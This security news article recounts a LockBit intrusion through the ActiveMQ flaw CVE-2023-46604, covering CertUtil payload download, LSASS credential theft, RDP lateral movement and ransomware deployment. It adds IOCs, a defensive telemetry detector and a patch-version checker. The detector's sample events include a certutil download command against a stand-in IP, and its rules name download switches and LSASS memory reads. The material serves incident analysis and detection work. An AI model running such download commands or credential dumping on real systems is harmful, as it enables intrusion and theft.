Threat actors recently gained initial access to an organization's network by exploiting a vulnerability (CVE-2023-46604) in an Apache ActiveMQ server. They were evicted after the initial intrusion, but eighteen days later they breached the same server again, and this time the intrusion ended in the deployment of LockBit ransomware over Remote Desktop Protocol (RDP).
The attack began in February 2024 against an internet-facing Apache ActiveMQ server that was still vulnerable to CVE-2023-46604, an unauthenticated deserialization flaw in the OpenWire protocol that lets an attacker make the broker load an arbitrary class. The attackers exploited it with a malicious XML configuration file loaded through a Spring class; the command embedded in that XML made the compromised server run Windows CertUtil to download a payload from a remote server.
The payload turned out to be a Metasploit stager, which the attacker used to escalate privileges and obtain SYSTEM-level access. From there the actor moved laterally across the network with Metasploit payloads delivered over SMB and compromised several systems. During this phase they accessed the memory of the LSASS process to harvest credentials, which proved essential for their later actions.
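Two of the host-level behaviours described above, CertUtil being used as a downloader by a process spawned from the ActiveMQ Java process and a non-system binary reading LSASS memory, are straightforward to detect from process telemetry. The following is an added example written for this article and is not code from The DFIR Report or from the original page. It runs over constructed, Sysmon-style events (process creation and process access records); the field names, the sample paths and the 198.51.100.7 address are assumptions made for the example, and the "parent is java.exe" heuristic assumes ActiveMQ runs under java.exe, which is the default but is not stated on the page.

```python
"""Detect certutil downloads and LSASS memory reads in Sysmon-style events.

Added example; not code from the page or from The DFIR Report. The events
below are constructed for illustration, and the field layout is an
assumption (id 1 = process creation, id 10 = process access)."""
import re

# Constructed sample telemetry (not real logs from the incident).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files\Java\bin\java.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "java.exe -jar activemq.jar start"},
    # Spring XML payload spawns certutil from the broker's java.exe (assumed parent)
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": r"certutil -urlcache -f http://198.51.100.7/payload.exe C:\Users\Public\payload.exe"},
    # Benign certutil use: hashing a file, no URL and no download switch
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -hashfile C:\tools\installer.msi SHA256"},
    # Stager opening LSASS with PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ
    {"id": 10, "source_image": r"C:\Users\Public\payload.exe",
     "target_image": r"C:\Windows\System32\lsass.exe",
     "granted_access": "0x1010"},
    # Normal OS component querying LSASS without VM_READ
    {"id": 10, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe",
     "granted_access": "0x1000"},
]

# certutil switches that fetch content from a URL
CERTUTIL_DOWNLOAD_SWITCHES = ("-urlcache", "/urlcache", "-verifyctl", "/verifyctl")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

PROCESS_VM_READ = 0x0010  # access right needed to dump LSASS memory
# Directories whose binaries are allowed to read LSASS (assumption; tune per estate)
TRUSTED_LSASS_READERS = ("c:\\windows\\system32\\", "c:\\program files\\")


def is_certutil_download(event):
    """True when certutil.exe is invoked with a download switch and a URL."""
    if event["id"] != 1 or not event["image"].lower().endswith("\\certutil.exe"):
        return False
    cmd = event["cmdline"].lower()
    return any(sw in cmd for sw in CERTUTIL_DOWNLOAD_SWITCHES) and bool(URL_RE.search(cmd))


def is_suspicious_lsass_access(event):
    """True when an untrusted binary opens lsass.exe with PROCESS_VM_READ."""
    if event["id"] != 10 or not event["target_image"].lower().endswith("\\lsass.exe"):
        return False
    granted = int(event["granted_access"], 16)
    if not granted & PROCESS_VM_READ:
        return False
    return not event["source_image"].lower().startswith(TRUSTED_LSASS_READERS)


def scan(events):
    """Return (rule_name, evidence) pairs for every matching event."""
    findings = []
    for event in events:
        if is_certutil_download(event):
            rule = "certutil_download"
            if event["parent"].lower().endswith("\\java.exe"):
                rule += "_from_java"  # broker process spawning a downloader
            findings.append((rule, event["cmdline"]))
        elif is_suspicious_lsass_access(event):
            findings.append(("lsass_memory_read", event["source_image"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The certutil rule deliberately keys on the download switches plus a URL rather than on certutil.exe alone, so routine hashing and certificate operations do not fire; the LSASS rule keys on the VM_READ bit, which credential dumpers need and most legitimate callers do not request.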
RDP Access and Post-Exploitation
Eighteen days after the first compromise, the threat actor returned through the same unpatched Apache ActiveMQ server. Once back in the network they again carried out privilege escalation, LSASS memory access, and lateral movement.
[Figure: LockBit is deployed by the ActiveMQ exploit (Source: thedfirreport)]
This time, however, the attacker used the credentials stolen in the first round to reach backup servers, file servers, and other hosts over RDP. They enabled RDP for persistence and installed the AnyDesk remote access tool.
Using that RDP access, they dropped and ran the LockBit ransomware on several hosts throughout the network. The LB3.exe and LB3_pass.exe ransomware binaries were launched interactively inside RDP sessions. Notably, instead of the standard LockBit practice of directing victims to a Tor leak site, the ransom note had been altered to instruct victims to contact the attacker over the Session messaging application.
Deployment of LockBit Ransomware
The ransomware was deployed across a range of systems, including backup servers and file servers. The attacker ran it with specific command-line flags that were most likely intended to enable its SMB spreading mechanism. After the ransomware had encrypted files across the network, ransom notes were left on the compromised systems.
Because RDP was the main channel through which the ransomware was executed and spread, this case underlines how important it is to secure remote access. The threat actor ceased activity after roughly four hours, leaving behind encrypted files and ransom demands. According to The DFIR Report, the attack is a prime example of the danger posed by unpatched vulnerabilities in internet-facing systems and of the possibility that attackers will return even after an initial eviction.
To reduce the risk of ransomware attacks like this one, organizations should prioritize patching known vulnerabilities in internet-facing services, securing remote access (RDP in particular), and monitoring for indications of lateral movement and credential theft.
Indicators of compromise
Type    Indicator     Value
SHA256  Ransomware    C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE
SHA256  Ransomware    8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6
IP      C2/AnyDesk    166.62.100.52
The attacker's use of the leaked LockBit builder further illustrates the growing sophistication and accessibility of ransomware operations, and highlights the importance of prompt detection and response to stop widespread damage.
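The single most effective mitigation in this case would have been patching the broker before the attacker's first visit, and certainly before the second. The check below, an added example not taken from the page or from The DFIR Report, compares an ActiveMQ version string against the releases that Apache shipped with the fix for CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6 and 5.18.3). The inventory of hostnames and versions it scans is constructed for the example, and treating every release newer than the 5.18 branch as fixed is an assumption stated in the code.

```python
"""Flag Apache ActiveMQ installs still exposed to CVE-2023-46604.

Added example; not code from the page or from The DFIR Report.
Fixed versions are taken from the Apache advisory for the CVE."""
import re

# First release on each supported branch that contains the fix.
FIXED_BY_BRANCH = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
OLDEST_SUPPORTED = (5, 15, 0)

VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Turn '5.18.2' (optionally followed by a suffix) into a comparable tuple."""
    match = VERSION_RE.match(text)
    if not match:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_vulnerable(version_text):
    """True if this ActiveMQ version predates the fix for CVE-2023-46604."""
    version = parse_version(version_text)
    branch = version[:2]
    if branch in FIXED_BY_BRANCH:
        return version < FIXED_BY_BRANCH[branch]
    # Anything older than 5.15 never received a fix; branches newer than
    # 5.18 (e.g. 6.x) shipped after it and are assumed to include it.
    return version < OLDEST_SUPPORTED


def vulnerable_hosts(inventory):
    """Return the hosts from an {host: version} mapping that still need patching."""
    return sorted(host for host, version in inventory.items() if is_vulnerable(version))


# Constructed inventory for the example; not real hosts.
SAMPLE_INVENTORY = {
    "mq-prod-01": "5.18.2",
    "mq-prod-02": "5.18.3",
    "mq-legacy":  "5.14.5",
    "mq-lab":     "5.17.6",
    "mq-new":     "6.0.1",
}

if __name__ == "__main__":
    for host in vulnerable_hosts(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is vulnerable to CVE-2023-46604")
```

Feed it the version reported by the broker's own tooling or by your asset inventory; the point is that only the branch-specific fixed release counts as patched, so a 5.18.2 host is exposed even though it is newer than a patched 5.15.16 one.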